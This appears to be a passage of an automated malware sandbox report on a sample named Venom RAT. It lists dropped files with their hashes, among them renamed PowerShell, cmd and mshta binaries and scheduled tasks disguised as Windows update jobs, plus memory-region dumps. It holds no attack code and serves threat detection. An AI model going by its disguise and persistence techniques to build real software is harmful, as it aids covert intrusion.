MD57539fd4fea86ec1e2a762ce8f32fdff4
SHA1c995911ca64dc419f95a4b93871d5ed9f5248f80
SHA2560767ba0a5fba38f87a7a07ea2fdf6f652b17774c4e03edcee255f5e96901f000
SHA512dc516d01156ba442582d3fde0b449ce97a1144dda7769a9e606b459404ee4914a4c4b54a8e687f41e4d61a06e15e71a80750dfaa977360cc24cf46cdc02e4262
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dxmklet2.35l.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exeFilesize
14.2MB
MD53b3a304c6fc7a3a1d9390d7cbff56634
SHA1e8bd5244e6362968f5017680da33f1e90ae63dd7
SHA2567331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
SHA5127f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5
-
C:\Users\Admin\AppData\Roaming\Venom.batFilesize
11.9MB
MD504fd97b8a5d2132eee84f856ee0fa938
SHA10d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a
SHA256bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49
SHA512e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778
-
C:\Windows\$sxr-cmd.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Windows\$sxr-mshta.exeFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
C:\Windows\$sxr-powershell.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
memory/512-104-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/624-92-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/624-91-0x0000027E1EEB0000-0x0000027E1EF50000-memory.dmpFilesize
640KB
-
memory/672-95-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/956-98-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1012-101-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1028-107-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1112-110-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1120-113-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1132-116-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1196-119-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1240-122-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1256-125-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1376-128-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1408-131-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1460-134-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/1552-137-0x00007FF90BA50000-0x00007FF90BA60000-memory.dmpFilesize
64KB
-
memory/2260-23-0x00007FF92CD10000-0x00007FF92D7D1000-memory.dmpFilesize
10.8MB
-
memory/2260-22-0x0000027383300000-0x0000027384134000-memory.dmpFilesize
14.2MB
-
memory/2260-21-0x00007FF92CD10000-0x00007FF92D7D1000-memory.dmpFilesize
10.8MB
-
memory/2520-77-0x0000020DF6920000-0x0000020DF711A000-memory.dmpFilesize
8.0MB
-
memory/2520-304-0x0000020DF7C20000-0x0000020DF7C5C000-memory.dmpFilesize
240KB
-
memory/2520-83-0x0000020DF7730000-0x0000020DF77F6000-memory.dmpFilesize
792KB
-
memory/2520-82-0x0000020DF7640000-0x0000020DF772C000-memory.dmpFilesize
944KB
-
memory/2520-81-0x0000020DF7590000-0x0000020DF7642000-memory.dmpFilesize
712KB
-
memory/2520-80-0x0000020DF7120000-0x0000020DF758C000-memory.dmpFilesize
4.4MB
-
memory/2520-88-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/2520-76-0x0000020DF6360000-0x0000020DF691E000-memory.dmpFilesize
5.7MB
-
memory/2520-75-0x00007FF94B9D0000-0x00007FF94BBC5000-memory.dmpFilesize
2.0MB
-
memory/2520-74-0x00007FF94B690000-0x00007FF94B74E000-memory.dmpFilesize
760KB
-
memory/2520-73-0x0000020DF5A50000-0x0000020DF6060000-memory.dmpFilesize
6.1MB
-
memory/2520-299-0x0000020DF7F70000-0x0000020DF8132000-memory.dmpFilesize
1.8MB
-
memory/2520-298-0x0000020DF7CE0000-0x0000020DF7D92000-memory.dmpFilesize
712KB
-
memory/2520-297-0x0000020DF7B20000-0x0000020DF7B70000-memory.dmpFilesize
320KB
-
memory/3464-34-0x000002A4C08C0000-0x000002A4C0904000-memory.dmpFilesize
272KB
-
memory/3464-38-0x00007FF94B9D0000-0x00007FF94BBC5000-memory.dmpFilesize
2.0MB
-
memory/3464-24-0x000002A4BFC00000-0x000002A4BFC22000-memory.dmpFilesize
136KB
-
memory/3464-39-0x000002A4C0A10000-0x000002A4C14DA000-memory.dmpFilesize
10.8MB
-
memory/3464-37-0x00007FF94B690000-0x00007FF94B74E000-memory.dmpFilesize
760KB
-
memory/3464-43-0x000002A4C1580000-0x000002A4C15AE000-memory.dmpFilesize
184KB
-
memory/3464-51-0x000002A4A78D0000-0x000002A4A78D8000-memory.dmpFilesize
32KB
-
memory/3464-36-0x000002A4F8C70000-0x000002A4F9508000-memory.dmpFilesize
8.6MB
-
memory/3464-40-0x000002A4C14E0000-0x000002A4C157A000-memory.dmpFilesize
616KB
-
memory/3464-42-0x000002A4C0910000-0x000002A4C0968000-memory.dmpFilesize
352KB
-
memory/3464-52-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/3464-35-0x000002A4C0990000-0x000002A4C0A06000-memory.dmpFilesize
472KB
-
memory/3464-41-0x000002A4BFC70000-0x000002A4BFCC2000-memory.dmpFilesize
328KB
-
memory/4028-0-0x00007FF92CD13000-0x00007FF92CD15000-memory.dmpFilesize
8KB
-
memory/4028-18-0x00007FF92CD10000-0x00007FF92D7D1000-memory.dmpFilesize
10.8MB
-
memory/4028-2-0x00007FF92CD10000-0x00007FF92D7D1000-memory.dmpFilesize
10.8MB
-
memory/4028-1-0x00000000002A0000-0x0000000001CCA000-memory.dmpFilesize
26.2MB